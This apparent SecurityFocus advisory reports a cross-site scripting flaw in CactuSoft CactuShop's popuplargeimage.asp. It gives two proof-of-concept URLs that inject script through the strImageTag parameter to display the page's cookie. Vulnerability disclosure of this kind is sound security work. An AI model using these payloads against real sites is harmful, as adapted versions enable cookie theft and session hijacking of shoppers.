CactuSoft CactuShop Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>

http://www.example.com/popuplargeimage.asp?strImageTag=<img+src="uploads/images_products_large/113.gif"%20onLoad="alert(document.cookie)">


 

Privacy Statement
Copyright 2010, SecurityFocus